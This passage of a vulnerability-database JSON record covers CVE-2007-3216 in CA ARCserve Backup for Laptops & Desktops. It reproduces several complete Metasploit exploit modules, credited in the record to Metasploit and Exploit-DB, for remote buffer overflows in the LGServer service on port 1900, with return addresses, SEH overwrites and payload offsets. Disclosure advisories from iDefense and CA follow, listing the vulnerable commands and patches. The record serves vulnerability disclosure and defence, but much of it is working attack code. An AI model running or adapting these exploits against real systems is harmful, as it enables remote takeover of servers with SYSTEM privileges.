\"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 2000 SP4 English',\t{ 'Ret' => 0x75022ac4 } ],\n ],\n 'DisclosureDate' => 'Jun 6 2007',\n 'DefaultTarget' => 0))\n\n register_options([ Opt::RPORT(1900) ])\n end\n\n def check\n\n connect\n\n sock.put(\"0000000019rxrGetServerVersion\")\n ver = sock.get_once\n\n disconnect\n\n if ( ver and ver =~ /11\\.1\\.742/ )\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n\n end\n\n def exploit\n\n connect\n\n rpc_commands = [\n \"rxsAddNewUser\",\n \"rxsSetUserInfo\",\n \"rxsRenameUser\",\n \"rxsExportData\",\n \"rxcReadSaveSetProfile\",\n \"rxcInitSaveSetProfile\",\n \"rxcAddSaveSetNextAppList\",\n \"rxcAddSaveSetNextFilesPathList\"\n ]\n\n rpc_command = rpc_commands[rand(rpc_commands.length)]\n\n data = rand_text_alpha_upper(62768)\n\n data[58468,8] = generate_seh_record(target.ret)\n data[58476,payload.encoded.length] = payload.encoded\n\n sploit = \"0000062768\"\t\t\t\t# Command Length Field\n sploit << rpc_command\t\t\t\t# RPC Command\n sploit << \"~~\"\t\t\t\t\t# Constant Argument Delimiter\n sploit << data\n\n print_status(\"Trying target #{target.name} with command '#{rpc_command}'...\")\n sock.put(sploit)\n\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/brightstor/lgserver_multi.rb"}], "exploitdb": [{"lastseen": "2016-02-01T23:48:16", "osvdbidlist": ["35329"], "references": [], "edition": 1, "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow. CVE-2007-3216. Remote exploit for windows platform", "reporter": "metasploit", "published": "2010-11-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3216"], "modified": "2010-11-03T00:00:00", "id": "EDB-ID:16409", "href": "https://www.exploit-db.com/exploits/16409/", "sourceData": "##\r\n# $Id: lgserver_rxsuselicenseini.rb 10892 2010-11-03 22:09:44Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\r\n\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an\r\n\t\t\t\tattacker could overflow the buffer and execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10892 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-3216' ],\r\n\t\t\t\t\t[ 'OSVDB', '35329' ],\r\n\t\t\t\t\t[ 'BID', '24348' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 700,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2003 SP0 English',\t{ 'Ret' => 0x71ae1f9b } ],\r\n\t\t\t\t\t[ 'Windows 2000 SP4 English',\t{ 'Ret' => 0x75031dce } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 6 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options([ Opt::RPORT(1900) ], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\r\n\t\tsock.put(\"0000000019rxrGetServerVersion\")\r\n\t\tver = sock.get_once\r\n\r\n\t\tdisconnect\r\n\r\n\t\tif ( ver =~ /11.1.742/ )\r\n\t\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tdata = rand_text_alpha_upper(4108) + [target.ret].pack('V')\r\n\t\tdata << payload.encoded + rand_text_alpha_upper(rand(300) + 1)\r\n\r\n\t\tsploit = \"0000004820\" # Command Length Field\r\n\t\tsploit << \"rxsUseLicenseIni\" # RPC Command\r\n\t\tsploit << \"~~\" # Constant Argument Delimiter\r\n\t\tsploit << data\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\t\t# One-shot overwrite...\r\n\t\tsock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16409/"}, {"lastseen": "2016-02-01T23:49:06", "osvdbidlist": ["35329"], "references": [], "edition": 1, "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow. CVE-2007-3216. Remote exploit for windows pla...", "reporter": "metasploit", "published": "2011-03-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3216"], "modified": "2011-03-10T00:00:00", "id": "EDB-ID:16415", "href": "https://www.exploit-db.com/exploits/16415/", "sourceData": "##\r\n# $Id: $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\r\n\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter),\r\n\t\t\t\tan attacker could overflow the buffer and execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10892 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-3216' ],\r\n\t\t\t\t\t[ 'OSVDB', '35329' ],\r\n\t\t\t\t\t[ 'BID', '24348' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 700,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2000 SP4 English',\t{ 'Ret' => 0x75031dce } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 6 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options([ Opt::RPORT(1900) ], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\r\n\t\tconnect\r\n\r\n\t\tsock.put(\"0000000019rxrGetServerVersion\")\r\n\t\tver = sock.get_once\r\n\r\n\t\tdisconnect\r\n\r\n\t\tif ( ver =~ /11.1.742/ )\r\n\t\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\tdata = rand_text_alpha_upper(20080) + [target.ret].pack('V')\r\n\t\tdata << payload.encoded + rand_text_alpha_upper(25000 - 20084 - payload.encoded.length)\r\n\r\n\t\tsploit = \"0000025000\"\t\t\t\t# Command Length Field\r\n\t\tsploit << \"rxsSetDataGrowthScheduleAndFilter\"\t# RPC Command\r\n\t\tsploit << \"~~\"\t\t\t\t\t# Constant Argument Delimiter\r\n\t\tsploit << data\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\t\tsock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16415/"}, {"lastseen": "2016-02-01T23:49:16", "osvdbidlist": ["35329"], "references": [], "edition": 1, "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow. CVE-2007-3216. Remote exploit for windows platform", "reporter": "metasploit", "published": "2010-11-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3216"], "modified": "2010-11-04T00:00:00", "id": "EDB-ID:16416", "href": "https://www.exploit-db.com/exploits/16416/", "sourceData": "##\r\n# $Id: lgserver_multi.rb 10909 2010-11-04 23:59:56Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\r\n\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,\r\n\t\t\t\tan attacker could overflow the buffer and execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10909 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-3216' ],\r\n\t\t\t\t\t[ 'OSVDB', '35329' ],\r\n\t\t\t\t\t[ 'BID', '24348' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 400,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2000 SP4 English',\t{ 'Ret' => 0x75022ac4 } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 6 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options([ Opt::RPORT(1900) ], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\r\n\t\tconnect\r\n\r\n\t\tsock.put(\"0000000019rxrGetServerVersion\")\r\n\t\tver = sock.get_once\r\n\r\n\t\tdisconnect\r\n\r\n\t\tif ( ver =~ /11.1.742/ )\r\n\t\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\trpc_commands = [\r\n\t\t\t\t\"rxsAddNewUser\",\r\n\t\t\t\t\"rxsSetUserInfo\",\r\n\t\t\t\t\"rxsRenameUser\",\r\n\t\t\t\t\"rxsExportData\",\r\n\t\t\t\t\"rxcReadSaveSetProfile\",\r\n\t\t\t\t\"rxcInitSaveSetProfile\",\r\n\t\t\t\t\"rxcAddSaveSetNextAppList\",\r\n\t\t\t\t\"rxcAddSaveSetNextFilesPathList\"\r\n\t\t\t]\r\n\r\n\t\trpc_command = rpc_commands[rand(rpc_commands.length)]\r\n\r\n\t\tdata = rand_text_alpha_upper(62768)\r\n\r\n\t\tdata[58468,8] = generate_seh_record(target.ret)\r\n\t\tdata[58476,payload.encoded.length] = payload.encoded\r\n\r\n\t\tsploit = \"0000062768\"\t\t\t\t# Command Length Field\r\n\t\tsploit << rpc_command\t\t\t\t# RPC Command\r\n\t\tsploit << \"~~\"\t\t\t\t\t# Constant Argument Delimiter\r\n\t\tsploit << data\r\n\r\n\t\tprint_status(\"Trying target #{target.name} with command '#{rpc_command}'...\")\r\n\t\tsock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16416/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "references": [], "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/bsabld-securitynotice.asp)\nSecurity Tracker: 1018216\n[Secunia Advisory ID:25606](https://secuniaresearch.flexerasoftware.com/advisories/25606/)\nOther Advisory URL: http://research.eeye.com/html/advisories/upcoming/20070604.html\nFrSIRT Advisory: ADV-2007-2121\n[CVE-2007-3216](https://vulners.com/cve/CVE-2007-3216)\nBugtraq ID: 24348\n", "edition": 1, "reporter": "OSVDB", "published": "2007-06-04T14:48:44", "title": "CA BrightStor ARCserve Backup for Laptops & Desktops Multiple Overflows", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-3216"], "modified": "2007-06-04T14:48:44", "href": "https://vulners.com/osvdb/OSVDB:35329", "id": "OSVDB:35329", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:23", "references": [], "description": "CA ARCServe Backup for Laptops and Desktops Multiple Buffer Overflow\r\nVulnerabilities\r\n\r\niDefense Security Advisory 09.20.07\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nSep 20, 2007\r\n\r\nI. BACKGROUND\r\n\r\nARCServe Backup for Laptops and Desktops is a version of ARCServe Backup\r\ntargeted at small to medium sized businesses, with many mobile/remote\r\nusers. It provides client agents that detect network connectivity and\r\ncommit backup data when it is found. For more information, consult the\r\nproduct home page at the following URL.\r\n\r\nhttp://www3.ca.com/solutions/Product.aspx?ID=263\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of multiple buffer overflow vulnerabilities in\r\nComputer Associates Inc.'s ARCServe Backup for Laptops and Desktops\r\nallows attackers to execute arbitrary code with SYSTEM privileges.\r\n\r\nThe LGServer contains multiple vulnerable functions that handle network\r\nrequests, several of which contain more than one vulnerability. All\r\ntogether there are nearly 60 buffer overflows in the LGServer.\r\n\r\nThe majority of these are the result of copying remotely supplied\r\nstrings into fixed-size buffers without validating that enough space is\r\navailable. A list of vulnerable commands follows.\r\n\r\nrxsAddNewUser, rxsSetUserInfo, rxsRenameUser, rxsSetMessageLogSettings,\r\nrxsExportData, rxsSetServerOptions, rxsRenameFile, rxsACIManageSend,\r\nrxsExportUser, rxsImportUser, rxsMoveUserData, rxsUseLicenseIni,\r\nrxsLicGetSiteId, rxsGetLogFileNames, rxsGetBackupLog,\r\nrxsBackupComplete, rxsSetDataProtectionSecurityData,\r\nrxsSetDefaultConfigName, rxsGetMessageLogSettings, rxsHWDiskGetTotal,\r\nrxsHWDiskGetFree, rxsGetSubDirs, rxsGetServerDBPathName,\r\nrxsSetServerOptions, rxsDeleteFile, rxsACIManageSend,\r\nrxcReadBackupSetList, rxcWriteConfigInfo, rxcSetAssetManagement,\r\nrxcWriteFileListForRestore, rxcReadSaveSetProfile,\r\nrxcInitSaveSetProfile, rxcAddSaveSetNextAppList,\r\nrxcAddSaveSetNextFilesPathList, rxcAddNextBackupSetIncWildCard,\r\nrxcGetRevisions, rxrAddMovedUser, rxrSetClientVersion\r\n\r\nBy sending requests for the above functions with specially crafted\r\nparameters, it is possible to cause a buffer overflow. Although most\r\ninvolve stack based buffers, several involve heap based buffers.\r\n\r\nAdditionally, a stack based buffer overflow vulnerability exists in the\r\nGetUserInfo() function. This function is a utility function that is\r\nused by many of the request handling functions. It is possible to\r\ntrigger this vulnerability by passing a long user name parameter to\r\nthis function.\r\n\r\nAnother stack based buffer overflow exists within the handler for the\r\nrxrLogin request. As its name suggests, this command logs in the user\r\nafter reading in the name and password. This handler contains several\r\nunsafe calls to wsprintf(). By providing a long user name it is\r\npossible to overflow a fixed size stack based buffer.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation allows an attacker to execute arbitrary code with SYSTEM\r\nprivileges.\r\n\r\nIn order to exploit these vulnerabilities, an attacker must be able to\r\nestablish a TCP session with the LGServer on port 1900. Unsuccessful\r\nexploitation attempts will crash the server, which will not restart\r\nautomatically.\r\n\r\nAll of these vulnerabilities, with the exception of those in the\r\nrxrLogin command, should only be able to be triggered by an\r\nauthenticated server administrator. However, due to the authentication\r\nbypass vulnerability described in a previous iDefense advisory any\r\nunauthenticated user can trigger them.\r\n\r\nIV. DETECTION\r\n\r\niDefense has confirmed the existence of these vulnerabilities in\r\nARCServe Backup for Laptops and Desktops version 11.1 (Build 900) for\r\nWindows. Other versions may also be affected.\r\n\r\nV. WORKAROUND\r\n\r\niDefense is currently unaware of any workarounds for this issue.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nComputer Associates has addressed these vulnerabilities with an update.\r\nFor more information consult CA's security notice at the following URL.\r\n\r\nhttp://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2007-5003 to the rxrLogin and GetUserInfo() issues. The remaining\r\nissues have been assigned CVE-2007-3216. These are candidates for inclusion\r\nin the CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems. \r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n03/21/2007 Initial vendor notification\r\n03/21/2007 Initial vendor response\r\n09/20/2007 Public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThese vulnerabilities were discovered by an anonymous researcher and Sean\r\nLarsson of VeriSign iDefense Labs. \r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2007 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.", "edition": 1, "reporter": "Securityvulns", "published": "2007-09-24T00:00:00", "title": "iDefense Security Advisory 09.20.07: CA ARCServe Backup for Laptops and Desktops Multiple Buffer Overflow Vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:23", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-5003", "CVE-2007-3216"], "modified": "2007-09-24T00:00:00", "id": "SECURITYVULNS:DOC:18048", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18048", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:27", "references": ["https://vulners.com/securityvulns/securityvulns:doc:18048", "https://vulners.com/securityvulns/securityvulns:doc:18047", "https://vulners.com/securityvulns/securityvulns:doc:18057", "https://vulners.com/securityvulns/securityvulns:doc:18049"], "description": "Authentication bypass, multiple buffer overflows TCP/1900.", "edition": 1, "reporter": "BUGTRAQ", "published": "2007-09-24T00:00:00", "title": "CA ARCServe Backup multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:27", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "CA Protection Suites", "version": "2", "operator": "eq"}, {"name": "CA Desktop Management Suite", "version": "11.2", "operator": "eq"}, {"name": "ARCserve Backup", "version": "11.1", "operator": "eq"}, {"name": "ARCServe Backup", "version": "4.0", "operator": "eq"}, {"name": "ARCserve Backup", "version": "11.5", "operator": "eq"}], "cvelist": ["CVE-2007-5006", "CVE-2007-5005", "CVE-2007-5003", "CVE-2007-3216", "CVE-2007-5004"], "modified": "2007-09-24T00:00:00", "id": "SECURITYVULNS:VULN:8179", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8179", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:25", "references": [], "description": "\r\nTitle: CA ARCserve Backup for Laptops and Desktops Server and CA \r\nDesktop Management Suite Multiple Vulnerabilities\r\n\r\nCA Advisory Date: 2008-04-03\r\n\r\nReported By: Dyon Balding of Secunia Research\r\n\r\nImpact: A remote attacker can execute arbitrary code or cause a \r\ndenial of service condition.\r\n\r\nSummary: CA ARCserve Backup for Laptops and Desktops Server \r\ncontains multiple vulnerabilities that can allow a remote attacker \r\nto execute arbitrary code or cause a denial of service condition. \r\nCA has issued updates to address the vulnerabilities. The first \r\nissue, CVE-2008-1328, occurs due to insufficient bounds checking \r\non command arguments by the LGServer service. The second issue, \r\nCVE-2008-1329, occurs due to insufficient verification of file \r\nuploads by the NetBackup service. In most cases, an attacker can \r\npotentially gain complete control of an affected installation. \r\nAdditionally, only a server installation of BrightStor ARCserve \r\nBackup for Laptops and Desktops is affected. The client \r\ninstallation is not affected.\r\n\r\nNote: the previously published patches for CVE-2007-3216 and \r\nCVE-2007-5005 did not fully address some issues.\r\n\r\nMitigating Factors: Client installations are not affected.\r\n\r\nSeverity: CA has given these vulnerabilities a maximum risk rating \r\nof High.\r\n\r\nAffected Products:\r\nCA ARCserve Backup for Laptops and Desktops r11.5\r\nCA ARCserve Backup for Laptops and Desktops r11.1 SP2\r\nCA ARCserve Backup for Laptops and Desktops r11.1 SP1\r\nCA ARCserve Backup for Laptops and Desktops r11.1\r\nCA ARCserve Backup for Laptops and Desktops r11.0\r\nCA Desktop Management Suite 11.2 English\r\nCA Desktop Management Suite 11.2 localized\r\nCA Desktop Management Suite 11.1\r\n\r\nAffected Platforms:\r\nWindows\r\n\r\nStatus and Recommendation:\r\nCA has provided updates to address the vulnerabilities.\r\nCA ARCserve Backup for Laptops and Desktops 11.1, 11.1 SP1, 11.2 \r\n SP2: QO95512\r\nCA ARCserve Backup for Laptops and Desktops 11.5: QO95513\r\nCA Desktop Management Suite 11.2 English: QO95513\r\nCA Desktop Management Suite 11.2 localized: QO95513\r\nCA Desktop Management Suite 11.1: Upgrade to 11.1 C1.\r\nCA ARCserve Backup for Laptops and Desktops 11.0: Upgrade to \r\n ARCserve Backup for Laptops and Desktops version 11.1 and apply \r\n the latest patches. QI85497\r\n\r\nHow to determine if you are affected:\r\n\r\nFor Windows:\r\n 1. Using Windows Explorer, locate the file "rxRPC.dll". The \r\n file can be found in the following default locations:\r\n Product: CA ARCserve Backup for Laptops and Desktops 11.5\r\n Directory Path: C:\Program Files\CA\BrightStor ARCserve Backup \r\n for Laptops & Desktops\Explorer\r\n Product: CA ARCserve Backup for Laptops and Desktops 11.1 \r\n Directory Path: C:\Program Files\CA\BrightStor ARCserve Backup \r\n for Laptops & Desktops\server\r\n Product: CA Desktop Management Suite 11.2 English\r\n Directory Path: C:\Program Files\CA\DSM\BABLD\MGUI\r\n Product: CA Desktop Management Suite 11.2 localized\r\n Directory Path: C:\Program Files\CA\DSM\BABLD\MGUI\r\n 2. Right click on the files and select Properties.\r\n 3. Select the General tab.\r\n 4. If the file date is earlier than indicated in the below \r\n table, the installation is vulnerable.\r\n\r\nProduct File Name File Date / Size\r\nCA ARCserve Backup for Laptops and Desktops 11.5\r\n rxRPC.dll February 18 2008 / 126976\r\nCA ARCserve Backup for Laptops and Desktops 11.1\r\n rxRPC.dll February 18 2008 / 114688\r\nCA Desktop Management Suite 11.2 English\r\n rxRPC.dll February 18 2008 / 126976\r\nCA Desktop Management Suite 11.2 localized\r\n rxRPC.dll February 18 2008 / 126976\r\n\r\nWorkaround: None\r\n\r\nReferences (URLs may wrap):\r\nCA Support:\r\nhttp://support.ca.com/\r\nSecurity Notice for CA ARCserve Backup for Laptops and Desktops \r\nServer and CA Desktop Management Suite\r\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=173105\r\nSolution Document Reference APARs:\r\nQO95512, QO95513, QI85497\r\nCA Security Response Blog posting:\r\nCA ARCserve Backup for Laptops and Desktops Server and CA Desktop \r\nManagement Suite Multiple Vulnerabilities\r\nhttp://community.ca.com/blogs/casecurityresponseblog/archive/2008/04/04/\\r\nca-arcserve-backup-for-laptops-and-desktops-server-and-ca-desktop-\\r\nmanagement-suite-multiple-vulnerabilities.aspx\r\nReported By: \r\nDyon Balding of Secunia Research\r\nCVE References:\r\nCVE-2008-1328 and CVE-2008-1329\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1328\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1329\r\nOSVDB References: Pending\r\nhttp://osvdb.org/\r\n\r\nChangelog for this advisory:\r\nv1.0 - Initial Release\r\n\r\nCustomers who require additional information should contact CA\r\nTechnical Support at http://support.ca.com.\r\n\r\nFor technical questions or comments related to this advisory, \r\nplease send email to vuln AT ca DOT com.\r\n\r\nIf you discover a vulnerability in CA products, please report your\r\nfindings to vuln AT ca DOT com, or utilize our "Submit a \r\nVulnerability" form. \r\nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\r\n\r\n\r\nRegards,\r\nKen Williams ; 0xE2941985\r\nDirector, CA Vulnerability Research\r\n\r\nCA, 1 CA Plaza, Islandia, NY 11749\r\n \r\nContact http://www.ca.com/us/contact/\r\nLegal Notice http://www.ca.com/us/legal/\r\nPrivacy Policy http://www.ca.com/us/privacy/\r\nCopyright (c) 2008 CA. All rights reserved.", "edition": 1, "reporter": "Securityvulns", "published": "2008-04-05T00:00:00", "title": "CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:25", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-5005", "CVE-2008-1329", "CVE-2008-1328", "CVE-2007-3216"], "modified": "2008-04-05T00:00:00", "id": "SECURITYVULNS:DOC:19571", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19571", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:23", "references": [], "description": 